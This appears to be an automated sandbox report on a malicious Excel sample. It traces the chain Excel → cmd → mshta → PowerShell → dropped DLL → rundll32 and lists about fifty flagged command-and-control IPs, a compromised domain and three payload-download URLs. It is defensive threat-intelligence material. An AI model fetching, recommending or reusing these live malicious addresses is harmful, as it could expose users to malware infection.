  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562430 Sample: 364453688149503140239183.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 50 129.232.188.93 xneeloZA South Africa 2->50 52 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->52 54 43 other IPs or domains 2->54 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 16 other signatures 2->70 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 48 C:\Users\...\364453688149503140239183.xls, Composite 15->48 dropped 60 Obfuscated command line found 15->60 19 cmd.exe 15->19         started        signatures6 process7 process8 21 mshta.exe 11 19->21         started        dnsIp9 56 91.240.118.168, 49165, 49166, 80 GLOBALLAYERNL unknown 21->56 24 powershell.exe 12 7 21->24         started        process10 dnsIp11 58 ayoobeducationaltrust.in 139.59.58.214, 49167, 80 DIGITALOCEAN-ASNUS Singapore 24->58 46 C:\ProgramData\QWER.dll, PE32 24->46 dropped 74 Powershell drops PE file 24->74 29 cmd.exe 24->29         started        file12 signatures13 process14 process15 31 rundll32.exe 29->31         started        process16 33 rundll32.exe 1 31->33         started        file17 44 C:\Windows\SysWOW64\...\cojfo.cqz (copy), PE32 33->44 dropped 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 33->62 37 rundll32.exe 33->37         started        signatures18 process19 process20 39 rundll32.exe 1 37->39         started        signatures21 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 39->72 42 rundll32.exe 39->42         started        process22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.154.133.20
 unknown France
12876 OnlineSASFR true
185.157.82.211
 unknown Poland
42927 S-NET-ASPL true
212.237.17.99
 unknown Italy
31034 ARUBA-ASNIT true
79.172.212.216
 unknown Hungary
61998 SZERVERPLEXHU true
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
173.214.173.220
 unknown United States
19318 IS-AS-1US true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
138.185.72.26
 unknown Brazil
264343 EmpasoftLtdaMeBR true
178.63.25.185
 unknown Germany
24940 HETZNER-ASDE true
160.16.102.168
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
81.0.236.90
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
216.158.226.206
 unknown United States
19318 IS-AS-1US true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
51.15.4.22
 unknown France
12876 OnlineSASFR true
159.89.230.105
 unknown United States
14061 DIGITALOCEAN-ASNUS true
162.214.50.39
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
91.240.118.168
 unknown unknown
49453 GLOBALLAYERNL true
200.17.134.35
 unknown Brazil
1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR true
217.182.143.207
 unknown France
16276 OVHFR true
107.182.225.142
 unknown United States
32780 HOSTINGSERVICES-INCUS true
51.38.71.0
 unknown France
16276 OVHFR true
45.118.135.203
 unknown Japan 63949 LINODE-APLinodeLLCUS true
50.116.54.215
 unknown United States
63949 LINODE-APLinodeLLCUS true
139.59.58.214
 ayoobeducationaltrust.in Singapore
14061 DIGITALOCEAN-ASNUS true
131.100.24.231
 unknown Brazil
61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR true
46.55.222.11
 unknown Bulgaria
34841 BALCHIKNETBG true
41.76.108.46
 unknown South Africa
327979 DIAMATRIXZA true
173.212.193.249
 unknown Germany
51167 CONTABODE true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
178.79.147.66
 unknown United Kingdom
63949 LINODE-APLinodeLLCUS true
212.237.5.209
 unknown Italy
31034 ARUBA-ASNIT true
162.243.175.63
 unknown United States
14061 DIGITALOCEAN-ASNUS true
176.104.106.96
 unknown Serbia
198371 NINETRS true
207.38.84.195
 unknown United States
30083 AS-30083-GO-DADDY-COM-LLCUS true
164.68.99.3
 unknown Germany
51167 CONTABODE true
192.254.71.210
 unknown United States
64235 BIGBRAINUS true
212.237.56.116
 unknown Italy
31034 ARUBA-ASNIT true
104.168.155.129
 unknown United States
54290 HOSTWINDSUS true
45.142.114.231
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
203.114.109.124
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH true
209.59.138.75
 unknown United States
32244 LIQUIDWEBUS true
159.8.59.82
 unknown United States
36351 SOFTLAYERUS true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
58.227.42.236
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
158.69.222.101
 unknown Canada
16276 OVHFR true
104.251.214.46
 unknown United States
54540 INCERO-HVVCUS true

Contacted Domains

Name IP Active
ayoobeducationaltrust.in 139.59.58.214 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/vvv/ppp/fe.png true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.168/vvv/ppp/fe.html true
    		unknown